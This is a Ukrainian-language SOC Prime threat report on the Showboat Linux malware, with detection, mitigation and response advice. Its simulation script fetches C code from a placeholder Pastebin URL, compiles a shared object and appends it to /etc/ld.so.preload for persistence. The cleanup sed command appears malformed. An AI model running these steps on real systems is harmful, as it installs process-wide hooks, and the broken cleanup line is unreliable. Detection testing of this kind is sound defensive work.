SOC Prime Bias: Високий

19 Jun 2026 07:48 UTC

Шкідливе програмне забезпечення Showboat націлене на телекомунікаційні компанії Близького Сходу з 2022 року

Author Photo
SOC Prime Team linkedin icon Стежити
Шкідливе програмне забезпечення Showboat націлене на телекомунікаційні компанії Близького Сходу з 2022 року
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Showboat — це модульна платформа післяексплуатації Linux, створена для довкілля AMD x86-64. Активна з середини 2022 року, її розроблено для збереження тихого, довготривалого доступу всередині заражених мереж. Шкідливе ПЗ використовує передові методи ухилення, зокрема XOR-шифрування та зловживання динамічним лінкером для приховування шкідливих процесів.

Розслідування

Розслідування привело командно-контрольну інфраструктуру до Ченду, Китаю, що разом із спостереженими тактиками, методиками та процедурами свідчить про зв’язки з загрозовими акторами, що підтримуються КНР. Технічний аналіз показав, що шкідливе ПЗ залежить від жорстко закодованого XOR-ключа для дешифрування своєї конфігурації та зловживає ld.so.preload для досягнення непомітності на заражених системах.

Пом’якшення

Захисники повинні стежити за несанкціонованими змінами до /etc/ld.so.preload та підозрілим використанням gcc компілятора на продукційних системах Linux. Також рекомендується розгортати моніторинг мережі, здатний ідентифікувати поведінку при маячкуванні, навіть якщо час випадковий, та використовувати моніторинг цілісності для критичних системних бібліотек.

Відповідь

Якщо виявлена активність Showboat, негайно ізолюйте заражені системи Linux від мережі, щоб зупинити подальший командно-контрольний трафік. Виконайте судову комп’ютерну експертизу пам’яті для ідентифікації вбудованих спільних об’єктів і проведіть повну перевірку налаштувань системи та запланованих завдань, щоб підтвердити, що всі механізми збереження були видалені.

Потік атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базового показника перед запуском має бути пройдена.

Обґрунтування: Цей розділ детально описує точне виконання методики атакуючого (TTP), призначене для активації правила виявлення. Команди та наратив МАЮТЬ прямо відображати ідентифіковані TTP та націлені на генерацію тієї точної телеметрії, яку очікує логіка виявлення. Абстрактні або несумісні приклади можуть призвести до неправильної діагностики.

  • Опис атаки & Команди: Атакуючий намагається встановити постійне перехоплення системних викликів. Вони починають з завантаження шкідливого вихідного файлу C з необробленого URL Pastebin за допомогою curl. Як тільки завантажено, вони використовують gcc з прапорцями -shared and -fPIC для компіляції вихідного коду у спільний об’єктний файл під назвою malicious.so. Нарешті, вони намагаються досягти стійкості, додаючи шлях до цієї бібліотеки у /etc/ld.so.preload. Ця послідовність покликана вбудувати шкідливу бібліотеку у кожен процес на системі.

  • Скрипт тесту регресій:

    #!/bin/bash
    # Симуляція TTP шкідливого ПЗ Showboat
    
    # 1. Симуляція отримання C вихідного файлу з Pastebin
    # Примітка: Використання реального необробленого посилання pastebin (можливе імітація строки)
    echo "Створення симуляції завантаження с пейстбіну..."
    echo 'void __attribute__((constructor)) init() {}' > fake_malware.c
    
    # Ця команда активує частину 'selection_fetch' правила
    curl -s https://pastebin.com/raw/example_id -o fake_malware.c
    
    # 2. Симуляція компіляції спільного об'єкта
    # Ця команда активує частину 'selection_compile' правила
    # (selection_fetch І selection_compile)
    gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c
    
    # 3. Симуляція модифікації ld.so.preload
    # Ця команда активує частину 'selection_preload' правила
    echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload
    
    echo "Симуляція завершена. Перевірте SIEM для отримання попереджень."
  • Команди очищення:

    #!/bin/bash
    # Очищення артефактів симуляції
    
    # Видалити шкідливу бібліотеку та джерело
    sudo rm -f /tmp/malicious.so
    rm -f fake_malware.c
    
    # Видалити запис з ld.so.preload (Необхідна обережність)
    # Ця команда sed видаляє рядок, що містить /tmp/malicious.so
    sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload
    
    echo "Очищення завершено."